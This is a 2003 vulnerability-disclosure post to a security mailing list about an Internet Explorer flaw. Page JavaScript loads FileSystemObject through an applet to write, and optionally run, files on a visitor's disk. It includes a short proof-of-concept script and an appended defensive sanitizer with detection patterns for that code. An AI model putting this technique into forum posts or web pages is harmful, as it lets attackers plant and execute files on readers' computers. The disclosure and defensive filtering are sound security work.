Internet Explorer JavaScript insecure function

From: FREEBRAIN (freebrain_at_unionnewbies.net)
Date: 12/07/03

    To: vuln-dev@securityfocus.com
    Date: Sun, 07 Dec 2003 15:56:57 +0100
    
    

    * Internet Explorer JavaScript insecure function *

    Product: Microsoft Internet Explorer
    Version: 5.x (probably other versions may be affected)

    ***

    Problem:

    I discovered that a JavaScript function (interpreted by Internet Explorer)
    called "file.writeline()" may be potentially dangerous for Internet Explorer
    users. This function allows writing files to a hard disk by means of
    JavaScript.

    An attacker may use this function by writing JavaScript code in posts on
    forums, guestbooks, etc. to own his victims' computers. With the
    "file.writeline()" function the attacker can write trojans/viruses/etc. on
    his victims' hard disks; for example, an attacker may use the JavaScript
    "file.writeline()" function to write a malicious file in the VBS (Visual
    Basic Scripting) language.

    I repeat, this may be potentially dangerous for Internet Explorer users.

    NOTE: Actually a virus in the wild that affects mIRC users is using this
    function ("file.writeline").

    NOTE2: As you can see on the "Proof of concept", other functions are needed
    to carry out an "intrusion".

    ***

    Proof of concept:

    InterfaceObject = document.applets[0];
    setTimeout("Write()", 1000);
    function Write() {
        fsoClassID = "{0D43FE01-F093-11CF-8940-00A0C9054228}";
        InterfaceObject.setCLSID(fsoClassID);
        fso = InterfaceObject.createInstance();
        // windir = fso.getspecialfolder ;
        filename = "\\proof.txt";
        var filecontent = "Hello world";
        file = fso.opentextfile(filename, "2", "TRUE");
        file.writeline(filecontent);
        file.close();
    }

    This code writes a file called "proof.txt" to the hard disk, with the
    content "Hello world". You can also execute files you write by means of
    JavaScript by adding "Run();" to the function.

    ***

    Solution:

    I'm not sure about the solution, but I recommend upgrading to the latest
    version of Internet Explorer. I also recommend that webmasters forbid HTML
    code that contains this function in their forums, guestbooks, etc.

    ***

    Thanks to:

    #disidents,#hackers,#hacker @ irc-phoenix.org

    #disidents,#sleepx,#ayuda_internet @ irc-hispano.org

    Special thanks go to: Impos, |_Tr0mP4s

    (sorry my poor english)

    ***

    By FREEBRAIN

    FREEBRAIN is a member of DisidentS Hacker Team

    http://disidents-team.cjb.net (under construction) -
    http://www.gratisweb.com/disidents

    <freebrain@unionnewbies.net> ( www.unionnewbies.net )
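
The webmaster-side recommendation above, sketched as an added example (not part of the original post): a forum or guestbook back end encodes every submitted post before rendering it, and separately flags posts carrying the markers visible in the proof of concept. The function names and sample inputs are assumptions made for illustration; the encoding step is the actual control, since a keyword filter alone is easy to miss variants with.

```javascript
// Added example: server-side handling of a submitted forum/guestbook post.
// escapeHtml, flagPost and handlePost are hypothetical helper names.

// Render-time defence: encode HTML metacharacters so a post displays as text.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Review-time check: active-content tags plus the identifiers that appear
// in the advisory's proof of concept (CLSID, setCLSID, writeline, ...).
const INDICATORS = [
  { name: "active-content tag", re: /<\s*(script|applet|object|embed|iframe)\b/i },
  { name: "inline event handler", re: /<[^>]*\son\w+\s*=/i },
  { name: "CLSID from the advisory", re: /0D43FE01-F093-11CF-8940-00A0C9054228/i },
  { name: "COM instantiation call", re: /\b(setCLSID|createInstance)\s*\(/i },
  { name: "file write call", re: /\.\s*(opentextfile|writeline)\s*\(/i },
];

// Convert a numeric character reference to its character, ignoring invalid values.
function fromRef(n) {
  return Number.isInteger(n) && n >= 0 && n <= 0x10ffff ? String.fromCodePoint(n) : "";
}

function flagPost(body) {
  // Decode numeric references first so "&#60;script" is not missed.
  const decoded = String(body)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromRef(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromRef(parseInt(d, 10)));
  return INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
}

// Store/render the encoded form; route flagged posts to moderation.
function handlePost(body) {
  return { html: escapeHtml(body), flags: flagPost(body) };
}
```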

